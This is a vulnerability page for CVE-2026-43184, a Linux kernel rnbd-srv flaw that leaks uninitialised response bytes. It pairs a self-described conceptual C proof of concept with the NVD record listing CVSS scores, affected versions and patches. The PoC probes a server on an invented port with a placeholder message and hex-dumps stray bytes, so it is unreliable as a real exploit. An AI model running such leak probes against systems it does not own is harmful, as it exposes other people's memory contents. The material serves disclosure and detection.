CVE-2026-43184

/* * Conceptual PoC for CVE-2026-43184 * This PoC simulates a client interacting with a vulnerable rnbd-srv server * to detect uninitialized memory bytes in the response. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <arpa/inet.h> #define RNB_SRV_PORT 12345 // Hypothetical port #define BUFFER_SIZE 4096 int main(int argc, char *argv[]) { int sock; struct sockaddr_in server; char message[32]; char server_reply[BUFFER_SIZE]; // Create socket sock = socket(AF_INET, SOCK_STREAM, 0); if (sock == -1) { perror("Could not create socket"); return 1; } server.sin_addr.s_addr = inet_addr("127.0.0.1"); server.sin_family = AF_INET; server.sin_port = htons(RNB_SRV_PORT); // Connect to vulnerable server if (connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0) { perror("Connection failed"); return 1; } printf("[+] Connected to target\n"); // Send a request that triggers a response // The specific message format depends on the RNBD protocol strcpy(message, "INIT_MSG"); if (send(sock, message, strlen(message), 0) < 0) { perror("Send failed"); return 1; } // Receive response int received_size = recv(sock, server_reply, BUFFER_SIZE, 0); if (received_size < 0) { perror("Receive failed"); return 1; } printf("[+] Received %d bytes\n", received_size); // Check for non-zero bytes in the padding area (simulated check) // Assuming the header is 16 bytes, check the rest for stray data int header_size = 16; if (received_size > header_size) { int leak_found = 0; for (int i = header_size; i < received_size; i++) { if (server_reply[i] != 0) { leak_found = 1; break; } } if (leak_found) { printf("[!] Potential memory leak detected in response buffer!\n"); printf("[!] Raw Hex Dump:\n"); for (int i = 0; i < received_size; i++) { printf("%02x ", (unsigned char)server_reply[i]); if ((i + 1) % 16 == 0) printf("\n"); } } else { printf("[-] Buffer appears zeroed (Target patched)\n"); } } close(sock); return 0; }

{"cve": {"id": "CVE-2026-43184", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:37.053", "lastModified": "2026-05-11T20:56:19.280", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nrnbd-srv: Zero the rsp buffer before using it\n\nBefore using the data buffer to send back the response message, zero it\ncompletely. This prevents any stray bytes to be picked up by the client\nside when there the message is exchanged between different protocol\nversions."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.8", "versionEndExcluding": "5.10.252", "matchCriteriaId": "464BA61B-CE8B-4D1B-A592-4F2484708263"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.202", "matchCriteriaId": "4002FC2B-1456-4666-B240-0EBF590C4671"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.165", "matchCriteriaId": "797C7F46-D0BE-4FB8-A502-C5EF8E6B6654"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.128", "matchCriteriaId": "851E9353-6C09-4CC9-877E-E09DB164A3C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.75", "matchCriteriaId": "BCE16369-98ED-41CF-8995-DFDC10B288D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/30868a6a5238849d554295aff3ce61d242d7fad8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/69d26698e4fd44935510553809007151b2fe4db5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7aac0a30dcf41cdb510526740d9a2ab1520c5d98", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/852475278ca5e96e0c0275950e1a84203e602b33", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b646e54d23b9b592d612a2036aab14e0f6c14206", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c94ede3c436dfbd9cedd9cb69f604f6fc901b6a2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e2cacec7d4291300a282feb3af8eba57b93b15aa", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e4272754063d52c9ad0169865add8816ba696471", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}